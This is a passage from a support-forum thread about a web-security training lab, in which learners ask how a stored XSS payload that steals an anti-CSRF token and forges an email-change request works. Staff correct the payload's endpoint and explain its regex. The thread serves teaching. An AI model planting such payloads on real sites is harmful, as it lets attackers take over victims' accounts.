Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Web Secuirty Academy- Exploiting XSS to perform CSRF

Pelumi | Last updated: Jun 06, 2019 10:02PM UTC

I am having trouble determing where to put the token within the payload given in the solution: <script> var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('get','/email',true); req.send(); function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('post', '/email', true); changeReq.send('csrf='+token+'&email=test@test.com') }; </script> Is it supposed to be replace (\w+)?

PortSwigger Agent | Last updated: Jun 07, 2019 01:58PM UTC

That code will automatically fetch the anti-CSRF token and include it in the second request. Try submitting it as a blog comment. If that doesn't work, drop us a line.

Burp User | Last updated: Jun 11, 2019 12:57AM UTC

I've tried multiple times to submit the code as a blog comment but I keep getting the 'Thank you for your comment' page with the lab unsolved.

Burp User | Last updated: Jun 11, 2019 01:53AM UTC

I copied the code and inserted into a blog comment verbatim.

PortSwigger Agent | Last updated: Jun 11, 2019 09:32AM UTC

We've just spotted there is a typo in the solution the line: bc. changeReq.open('post', '/email', true); should be: bc. changeReq.open('post', '/email/change', true); We will get this fixed in the coming days, but for now you can manually do this.

Burp User | Last updated: Jun 11, 2019 02:19PM UTC

Thanks much.

Methoros | Last updated: Apr 28, 2020 11:17AM UTC

Wanted to ask as I havent been able to find the answer. In this portion of the code below, var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; What is the [1] for? Is it to search for the number 1 of an array value 1? Javascript is 0 based so what is the [1] for?

Hannah, PortSwigger Agent | Last updated: Apr 30, 2020 11:20AM UTC

Hi In this function, we are using regex matching. With regex, you provide a pattern in between slashes, like /foo/ and then match against a string like "foo bar". A match object is returned, so if the match object variable name is "m": m[0] == "foo" If you use a pattern like /foo (bar)/ against "foo bar", the parentheses provide a "submatch". /foo (bar)/ against "foo bar": m[0] == "foo bar" m[1] == "bar" /(foo) (bar)/ against "foo bar": m[0] == "foo bar" m[1] == "foo" m[2] == "bar" Therefore, we use the [1] to retrieve the value of the csrf token that is contained within the parentheses, rather than the whole string.

Aakash | Last updated: Apr 22, 2021 10:03AM UTC

var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; Can anyone explain step by step what exactly is the regex doing? Why this particular sequence of slashes (backward and then forward), the +sign, the w

Hannah, PortSwigger Agent | Last updated: Apr 22, 2021 10:28AM UTC

The two forward slashes in the "match" function denote the start and end of the regular expression.

For a step-by-step breakdown of a regular expression, I would recommend pasting the expression (/name="csrf" value="(\w+)"/) into an online tool, like RegExr - it's really handy for breaking down the different components to help you understand what's going on!

Muhammed | Last updated: Jul 08, 2021 07:14PM UTC

i wonder how is it sending the request with csrf token and we didn't use the var token after assigning it ?

Hannah, PortSwigger Agent | Last updated: Jul 12, 2021 08:50AM UTC